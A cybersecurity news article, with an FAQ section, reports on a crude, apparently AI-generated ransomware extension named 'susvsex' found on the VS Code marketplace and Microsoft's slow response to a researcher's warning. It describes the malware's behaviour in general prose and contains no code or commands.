Title: AI-Powered Ransomware Test Emerges on VS Code Marketplace

By Bill Toulas
November 6, 2025

A newly discovered malicious extension, exhibiting rudimentary ransomware capabilities, has found its way onto Microsoft’s Visual Studio Code (VS Code) marketplace. Identified as ‘susvsex’ and attributed to a publisher known as ‘suspublisher18’, this extension’s malevolent functions are explicitly detailed in its description, raising significant concerns among cybersecurity experts.

Researcher John Tuckner from Secure Annex unearthed ‘susvsex’ and characterizes it as a product of “vibe coding,” suggesting that it lacks sophistication. Despite Tuckner’s efforts to alert Microsoft about the extension’s alarming capabilities—such as file theft to a remote server and the AES-256-CBC encryption of files—his warnings were overlooked, leaving the extension on the VS Code marketplace.

Understanding the Functionality of the Ransomware Extension

Upon installation or when VS Code is launched, the extension triggers an event that initializes its ‘extension.js’ file, revealing hardcoded values like IP addresses, encryption keys, and the command-and-control (C2) address. Tuckner notes that many comments within this code imply it was likely generated by an AI tool rather than being manually coded by its publisher.

When activated, the extension executes a function called ‘zipUploadAndEncrypt’, which looks for a specific marker text file and commences its encryption process. It creates a .ZIP file containing the files from a designated target directory, then exfiltrates these files to the predetermined C2 address, effectively replacing the original files with their encrypted counterparts.

Data Exfiltration Mechanism

Tuckner’s investigation reveals that the extension periodically polls a private GitHub repository for commands. It checks an ‘index.html’ file that utilizes a Personal Access Token (PAT) for authentication to execute any commands present. By leveraging this hardcoded PAT, Tuckner was able to access information about the host, which led him to believe that the repository owner is likely located in Azerbaijan.

The overt nature of the extension poses a significant risk, as it may represent an experimental attempt to probe Microsoft’s vetting processes for marketplace submissions.

The Implications of ‘susvsex’ on the VS Code Marketplace

Labeling ‘susvsex’ as an ‘AI slop’, Secure Annex highlights that its malicious intents are laid bare in the README file. However, they caution that with a few modifications, the extension could evolve into a far more potent threat. The alarming situation has prompted BleepingComputer to reach out to Microsoft for an official statement, and while the extension remained active at the time of reporting, it was ultimately removed shortly thereafter.

Conclusion

The emergence of the ‘susvsex’ ransomware extension on the VS Code marketplace spotlights the growing risks associated with AI-assisted coding and marketplace security. Microsoft’s apparent inaction despite clear warnings raises questions about the effectiveness of their vetting processes for extensions. As the cybersecurity landscape continuously evolves, this incident serves as a reminder for developers and platform operators to maintain vigilance against potential threats, particularly those that leverage AI technology. Continuous monitoring and robust security measures are essential to protect users from similar risks in the future.

FAQ Section

1. What is the ‘susvsex’ extension?
The ‘susvsex’ extension is a malicious tool found on the VS Code marketplace that employs basic ransomware functionalities, including file encryption and data exfiltration.

2. How does the ransomware in ‘susvsex’ operate?
Upon installation or launch of VS Code, the extension initiates its code, creates a ZIP archive of specified files, and sends them to a hardcoded remote server before encrypting the originals.

3. Was Microsoft informed about the extension?
Yes, researcher John Tuckner reported the extension to Microsoft due to its explicit malicious capabilities, but the report was initially ignored.

4. What are the potential risks of the ‘susvsex’ extension?
The extension poses a data theft threat and could lead to significant disruptions for developers using affected files. It may also represent a broader issue regarding marketplace security and AI-generated code.

5. Why is ‘susvsex’ considered an “AI slop”?
The term “AI slop” refers to code that appears to be poorly generated or lacking sophistication, likely produced by AI tools without a thorough understanding of secure coding practices.